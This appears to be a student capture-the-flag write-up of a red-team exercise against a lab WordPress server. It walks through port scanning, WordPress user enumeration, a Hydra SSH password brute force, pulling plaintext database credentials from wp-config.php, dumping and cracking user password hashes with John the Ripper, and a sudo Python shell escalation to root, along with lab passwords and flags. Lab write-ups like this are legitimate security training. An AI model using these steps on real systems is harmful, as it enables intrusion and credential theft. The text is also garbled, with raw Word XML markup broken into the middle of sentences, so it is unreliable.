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#Red Team: Summary of Operations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## Table of Contents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Exposed Services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 Critical Vulnerabilities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Exploitation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### Exposed Services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_TODO: Fill out the information below._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```bash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$ nmap -sV 192.168.1.110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 Target 1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- List of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- Exposed Services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22/tcp open ssh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80/tcp open http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111/tcp open rpcbind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139/tcp open netbois-ssn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445/tcp open netbois-ssn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- Target 1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- List of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- Critical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- Vulnerabilities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_TODO: Include vulnerability scan results to prove the identified vulnerabilities._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### Exploitation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_TODO: Fill out the details below. Include screenshots where possible._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 Red Team was able to penetrate `Target 1` and retrieve the following confidential data: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 Target 1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- `flag1.txt`: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b9bbcb33e11b80be759c4e844862482d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- **Exploit Used**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WPScan to enumerate users of the Target 1 WordPress site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Wpscan –url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http://192.168.1.110</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> –enumerate u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Target user Michal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Execute Hydra Brute Force Attack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 $ hydra -l michael -P /usr/share/wordlists/rockyou.txt 192.168.1.110 ssh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Password: Michael</w:t>
      </w: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SSH into Michaels account using their criteria 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in start searching and find that $ /cd /var/www/html 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Looking through those files find that cat service.html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6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- _TODO: Include the command run_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- `flag2.txt`:fc3fd58dcdad9ab23faca6e9a36e581c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- **Exploit Used**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Same steps as the last flag to gain access into user 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Than find the flag in /var/www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276600" cy="1409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Flag 3  : afc01ab50591e7dccf93122770cd2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 into $ cd /var/www/http/wordpress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Than $ cat wp-config.php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in plain text the user and password to gain root access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root and the password was R@v3nSecurity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the command $ show database;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$ use wordpress;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$ show tables;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wp_posts;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962150" cy="16954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247900" cy="28384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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag4: 715dea6c055b9fe3337544932f2941ce</w:t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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit used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 of weak password salted hashes and Python root escalation privileges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Capture flag 4 by retrieving user credentials from database, using john the ripper to crack password hash and use Python Escalation Privileges to gain root access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Previously gained access to the database credential as Michael from the sp-config.phpfil, cracking password hashes gathered from MYSQL was the next step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These user credentials are stored in the the wp_users table of the wordpress database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usernames and password hashes were copied/saved to the Kali machine in a file called wp_hashes.txt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Command $ SELECT ID, user_login, user_pass FROM wp_users;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2160" w:hanging="36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When I exported the hashes, I saved them individually as stevenhash.txt and michaelhash.txt and ran them against John the Ripper to crack the hashes.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before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="216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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:spacing w:before="60" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="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john stevenhash.txt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0" w:afterAutospacing="0" w:before="120" w:lineRule="auto"/>
        <w:ind w:left="216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john michaelhash.txt; the execution of performing the john the ripper kept ongoing; but we already had the password from the previous activity.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0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17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alt 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0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="216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Once Steven’s password hash was cracked, the next thing to do was SSH as Steven. Then as Steven checked for the privilege and escalated to root with Python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0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="216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Command: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0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="216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$ ssh steven@192.168.1.110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 w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="216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$ pw:pink84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after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="216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$ sudo -l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after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="216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$ sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’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afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="216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$ cd /root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after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="216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$ ls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before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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$ cat flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064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hyperlink" Target="https://github.com/Juan-byte-megabyte/Rice-CyberSecurity-FinalProject/blob/33c3d21df349df89410d1cbbdf73db2f9914a7a7/Images/Offense%20Images/jtrstevenhash.png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5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.110" TargetMode="External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